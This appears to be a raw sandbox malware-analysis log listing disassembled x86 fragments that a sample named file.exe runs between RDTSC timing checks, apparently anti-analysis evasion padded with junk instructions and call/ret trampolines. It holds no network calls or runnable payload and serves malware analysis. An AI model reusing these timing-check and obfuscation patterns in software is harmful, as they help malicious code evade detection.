Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DEF7E second address: 9DEFEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 56C49142h 0x0000000f movsx ecx, di 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FF7D4C1B428h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e mov edx, dword ptr [ebp+122D2CABh] 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007FF7D4C1B428h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 00000016h 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 push 00000003h 0x00000052 mov edi, dword ptr [ebp+122D2CD7h] 0x00000058 call 00007FF7D4C1B429h 0x0000005d pushad 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DEFEC second address: 9DF008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FF7D4C1B3B4h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DF008 second address: 9DF02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push edi 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop edi 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jns 00007FF7D4C1B42Ch 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DF02B second address: 9DF035 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF7D4C1B3ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DF035 second address: 9DF041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ebx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DF041 second address: 9DF0C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jne 00007FF7D4C1B3C4h 0x00000010 pop eax 0x00000011 mov dx, F078h 0x00000015 mov dword ptr [ebp+122D17FDh], edi 0x0000001b lea ebx, dword ptr [ebp+1244DA5Fh] 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007FF7D4C1B3A8h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 0000001Bh 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b call 00007FF7D4C1B3ACh 0x00000040 or dword ptr [ebp+122D17D2h], ecx 0x00000046 pop esi 0x00000047 push eax 0x00000048 jp 00007FF7D4C1B3B8h 0x0000004e push eax 0x0000004f push edx 0x00000050 jng 00007FF7D4C1B3A6h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7AD8 second address: 9D7AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FD13B second address: 9FD13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FD13F second address: 9FD145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FD2A5 second address: 9FD2A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FD2A9 second address: 9FD2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FF7D4C1B426h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FD40B second address: 9FD422 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF7D4C1B3ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FD422 second address: 9FD428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FD428 second address: 9FD457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF7D4C1B3A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF7D4C1B3B5h 0x00000012 jmp 00007FF7D4C1B3ADh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FD751 second address: 9FD75E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FD75E second address: 9FD764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FD764 second address: 9FD76A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FD76A second address: 9FD76E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FD76E second address: 9FD772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FD772 second address: 9FD780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FF7D4C1B3A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FD8D1 second address: 9FD8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FD8D5 second address: 9FD8D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FDA6E second address: 9FDA72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FDA72 second address: 9FDA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jns 00007FF7D4C1B3A6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FDB95 second address: 9FDB99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FDB99 second address: 9FDB9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FDB9D second address: 9FDBA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FDBA8 second address: 9FDBAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FDD38 second address: 9FDD42 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF7D4C1B42Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FDE99 second address: 9FDEBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FF7D4C1B3ACh 0x0000000f jp 00007FF7D4C1B3A6h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FDEBD second address: 9FDEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FE332 second address: 9FE33C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FF7D4C1B3A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FE33C second address: 9FE342 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F4E81 second address: 9F4E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF7D4C1B3A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F4E8B second address: 9F4E9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B42Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F4E9C second address: 9F4EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F4EA2 second address: 9F4EAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF7D4C1B426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06059 second address: A06064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF7D4C1B3A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B509 second address: A0B50E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B50E second address: A0B513 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B513 second address: A0B522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007FF7D4C1B42Eh 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0A857 second address: A0A866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007FF7D4C1B3ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0AB2A second address: A0AB53 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FF7D4C1B42Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jnl 00007FF7D4C1B426h 0x00000012 jmp 00007FF7D4C1B42Bh 0x00000017 pop eax 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0AB53 second address: A0AB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B212 second address: A0B223 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 js 00007FF7D4C1B426h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B373 second address: A0B3A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 js 00007FF7D4C1B3ACh 0x0000000c jo 00007FF7D4C1B3A6h 0x00000012 jmp 00007FF7D4C1B3ACh 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF7D4C1B3B2h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B3A6 second address: A0B3AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B3AC second address: A0B3B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0BD23 second address: A0BD96 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF7D4C1B426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnl 00007FF7D4C1B426h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 popad 0x00000015 xor dword ptr [esp], 6E92274Ch 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007FF7D4C1B428h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 call 00007FF7D4C1B435h 0x0000003b mov edi, dword ptr [ebp+122D2BA7h] 0x00000041 pop edi 0x00000042 and esi, dword ptr [ebp+122D2B3Fh] 0x00000048 push E4238358h 0x0000004d pushad 0x0000004e jmp 00007FF7D4C1B42Ch 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0BD96 second address: A0BD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C04D second address: A0C056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C056 second address: A0C05A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C20B second address: A0C211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C211 second address: A0C215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C2D4 second address: A0C2F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7D4C1B438h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C93A second address: A0C940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C940 second address: A0C944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0CC90 second address: A0CC94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0CD35 second address: A0CD3F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF7D4C1B426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0CE16 second address: A0CE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0CE26 second address: A0CE2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0DC1C second address: A0DC21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0DB08 second address: A0DB1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FF7D4C1B428h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0F83E second address: A0F86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7D4C1B3B7h 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jnc 00007FF7D4C1B3A6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0F86C second address: A0F8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop esi 0x00000009 popad 0x0000000a nop 0x0000000b jng 00007FF7D4C1B42Ah 0x00000011 mov si, 2D5Dh 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007FF7D4C1B428h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov edi, dword ptr [ebp+122D2BABh] 0x00000037 push 00000000h 0x00000039 movzx edi, dx 0x0000003c xchg eax, ebx 0x0000003d pushad 0x0000003e jmp 00007FF7D4C1B42Bh 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A12248 second address: A12267 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007FF7D4C1B3CBh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A12267 second address: A1226B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A19168 second address: A1916E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1916E second address: A191D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B438h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jnp 00007FF7D4C1B42Ch 0x00000012 adc edi, 19422664h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007FF7D4C1B428h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 push 00000000h 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FF7D4C1B42Eh 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A191D1 second address: A191E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A12046 second address: A1204A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1C27E second address: A1C283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A193CD second address: A193D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1A390 second address: A1A397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A193D1 second address: A193D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A193D5 second address: A193EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FF7D4C1B3A8h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1D338 second address: A1D33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A20F0F second address: A20FA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FF7D4C1B3A6h 0x00000009 jnp 00007FF7D4C1B3A6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007FF7D4C1B3A8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d and di, 1B0Fh 0x00000032 push 00000000h 0x00000034 mov ebx, edi 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007FF7D4C1B3A8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 mov bx, di 0x00000055 jg 00007FF7D4C1B3A6h 0x0000005b xchg eax, esi 0x0000005c jmp 00007FF7D4C1B3AEh 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push edi 0x00000065 jmp 00007FF7D4C1B3B4h 0x0000006a pop edi 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1E31C second address: A1E330 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B430h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A21E8D second address: A21EFB instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF7D4C1B3ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FF7D4C1B3A8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+1245F791h] 0x0000002b push 00000000h 0x0000002d and ebx, 73E3C9E0h 0x00000033 xor ebx, 0CA37474h 0x00000039 push 00000000h 0x0000003b jmp 00007FF7D4C1B3ACh 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FF7D4C1B3B9h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1E330 second address: A1E342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7D4C1B42Eh 0x00000009 rdtsc
